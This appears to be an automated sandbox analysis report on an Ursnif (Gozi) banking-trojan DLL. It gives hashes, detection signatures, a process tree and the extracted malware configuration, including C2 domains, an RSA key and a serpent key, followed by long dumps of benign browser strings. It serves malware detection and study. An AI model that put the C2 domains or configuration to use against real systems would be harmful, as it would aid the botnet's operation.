Loading ...

Play interactive tourEdit tour

Analysis Report racial.drc

Overview

General Information

Sample Name:racial.drc (renamed file extension from drc to dll)
Analysis ID:429224
MD5:7baac8ddbdcdf8e60b4a2d91fa6e1bef
SHA1:7ba908347f36deec45bff3c5d61de26333598636
SHA256:8b288921b1564824348d566efea90f5b3915a37d0e3b8a2a3e0a95299013890b
Tags:dllGozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Yara detected Ursnif
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the installation date of Windows
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\racial.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 1932 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3864 cmdline: rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 2396 cmdline: regsvr32.exe /s C:\Users\user\Desktop\racial.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • iexplore.exe (PID: 2212 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
      • iexplore.exe (PID: 3728 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
      • iexplore.exe (PID: 5644 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17426 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • rundll32.exe (PID: 1848 cmdline: rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
        00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
          00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.3.rundll32.exe.3128d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.regsvr32.exe.30b8d03.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.6e200000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  5.2.rundll32.exe.6e200000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.2.regsvr32.exe.6e200000.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 3 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "XcnD2ewKHEUCtK1f+aLgHrNg0ax+yJaEQWHiRnybZBp8+uodMhISWv4leSoo8qv94Yp7nN7eHJ+Fwyn8u61qqsKGP3Tc6znVTKRLbzT9WPZrMuSsdt/HztnVs/3QyB9AYrjoSg/9XVCi/ZMXWvk+/9j1f+VWv2RCJlTSph0Uzve7FtxnOT0xBl6o7ggjmqCVLob3OKmyZthO+zptVxFaL1Wnba2K0H5ySB9eH0SzymLsPN5KihXQerCvcZD5sVgXqV1Djx7J0lE1iMtQGxg1y8vjo/XtpKTIx/8piDl5mkVVyl+2UAXptU9jjxuCv3gZSzWsmQVsHERv19M1JbQKUMsIbdhZipSpKsasQY04yK4=", "c2_domain": ["authd.feronok.com", "raw.pablowilliano.at"], "botnet": "1500", "server": "580", "serpent_key": "N6Xp8oSBB81TOAN9", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: authd.feronok.comVirustotal: Detection: 10%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: racial.dllVirustotal: Detection: 23%Perma Link
                      Source: racial.dllReversingLabs: Detection: 31%
                      Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49718 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49719 version: TLS 1.2
                      Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.473191457.000000006E259000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.471562632.000000006E259000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.473947664.000000006E259000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.475828227.000000006E259000.00000002.00020000.sdmp, racial.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E250D7A FindFirstFileExW,0_2_6E250D7A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E250D7A FindFirstFileExW,2_2_6E250D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E250D7A FindFirstFileExW,3_2_6E250D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E250D7A FindFirstFileExW,5_2_6E250D7A
                      Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
                      Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
                      Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
                      Source: de-ch[1].htm.6.drString found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
                      Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                      Source: msapplication.xml0.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8bc19ea3,0x01d758dd</date><accdate>0x8bc19ea3,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                      Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                      Source: msapplication.xml5.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                      Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                      Source: msapplication.xml7.4.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bc824a5,0x01d758dd</date><accdate>0x8bc824a5,0x01d758dd</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                      Source: de-ch[1].htm.6.drString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen|https://twitter.com/i/notifications;Ich|#;Abmelden|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play|https://aka.ms/Ixhi8e;me_groove_taskLinks_try|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
                      Source: de-ch[1].htm.6.drString found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"&nbsp;&nbsp;&nbsp;Ref 2: "+e.html(t.clientSettings.sid||"000000")+"&nbsp;&nbsp;&nbsp;Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console||{}).timeStamp?console.timeStamp(n):(r.performance||{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: www.msn.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns#
                      Source: de-ch[1].htm.6.drString found in binary or memory: http://ogp.me/ns/fb#
                      Source: auction[1].htm.6.drString found in binary or memory: http://popup.taboola.com/german
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
                      Source: msapplication.xml.4.drString found in binary or memory: http://www.amazon.com/
                      Source: msapplication.xml1.4.drString found in binary or memory: http://www.google.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
                      Source: msapplication.xml2.4.drString found in binary or memory: http://www.live.com/
                      Source: msapplication.xml3.4.drString found in binary or memory: http://www.nytimes.com/
                      Source: msapplication.xml4.4.drString found in binary or memory: http://www.reddit.com/
                      Source: msapplication.xml5.4.drString found in binary or memory: http://www.twitter.com/
                      Source: msapplication.xml6.4.drString found in binary or memory: http://www.wikipedia.com/
                      Source: msapplication.xml7.4.drString found in binary or memory: http://www.youtube.com/
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://amzn.to/2TTxhNg
                      Source: auction[1].htm.6.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_na
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://client-s.gateway.messenger.live.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&amp;a=3064090&amp;g=24886692
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                      Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                      Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
                      Source: auction[1].htm.6.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1622736225&amp;rver
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622736225&amp;rver=7.0.6730.0&am
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/logout.srf?ct=1622736226&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1622736225&amp;rver=7.0.6730.0&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/#qt=mru
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com/about/en/download/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;Fotos
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://outlook.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/calendar
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
                      Source: imagestore.dat.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKFgOM.img?h=368&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXITZ.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://support.skype.com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://twitter.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://twitter.com/i/notifications;Ich
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
